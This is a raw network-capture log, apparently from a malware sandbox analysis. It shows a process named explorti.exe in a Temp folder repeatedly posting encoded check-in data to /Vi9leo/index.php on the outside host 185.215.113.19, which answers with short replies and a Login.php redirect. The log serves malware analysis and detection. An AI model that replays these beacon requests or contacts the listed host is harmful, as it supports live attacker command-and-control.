Sep 1, 2024 06:30:09.444837093 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:30:10.747200966 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:30:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Sep 1, 2024 06:30:10.747879982 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:30:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Sep 1, 2024 06:30:10.750319004 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:30:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
127	192.168.2.5	49883	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:30:10.868751049 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:30:11.639899969 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:30:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
128	192.168.2.5	49884	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:30:11.654396057 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:30:12.409432888 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:30:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
129	192.168.2.5	49885	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:30:12.521786928 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:30:13.284802914 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:30:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
130	192.168.2.5	49886	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:30:13.301039934 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:30:14.077392101 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:30:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
131	192.168.2.5	49887	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:30:14.195271015 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:30:14.941607952 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:30:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
132	192.168.2.5	49888	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:30:14.964756966 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:30:15.712637901 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:30:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
133	192.168.2.5	49889	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:30:15.836154938 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:30:16.583749056 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:30:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
134	192.168.2.5	49890	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:30:16.593467951 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:30:17.358562946 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:30:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
135	192.168.2.5	49891	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:30:17.567154884 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:30:18.328773022 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:30:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
136	192.168.2.5	49892	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:30:18.339299917 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:30:19.509068966 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:30:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Sep 1, 2024 06:30:19.509146929 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:30:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
137	192.168.2.5	49893	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:30:19.637778044 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:30:20.396526098 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:30:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
138	192.168.2.5	49894	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:30:20.406785011 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:30:21.197861910 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:30:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
139	192.168.2.5	49895	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:30:21.548779011 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:30:22.310353041 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:30:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
140	192.168.2.5	49896	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:30:22.327008963 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:30:23.076364994 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:30:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
141	192.168.2.5	49897	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:30:23.192336082 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:30:23.933878899 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:30:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
142	192.168.2.5	49898	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:30:23.943778992 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:30:24.690993071 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:30:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
143	192.168.2.5	49899	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:30:24.819926977 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:30:26.113018990 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:30:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 1, 2024 06:30:26.113037109 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:30:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 1, 2024 06:30:26.113045931 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:30:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
144	192.168.2.5	49900	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:30:26.123132944 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:30:26.896142960 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:30:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
145	192.168.2.5	49901	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:30:27.033768892 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:30:27.792512894 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:30:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
146	192.168.2.5	49902	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:30:27.803415060 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:30:28.552489996 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:30:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
147	192.168.2.5	49903	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:30:28.679476976 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
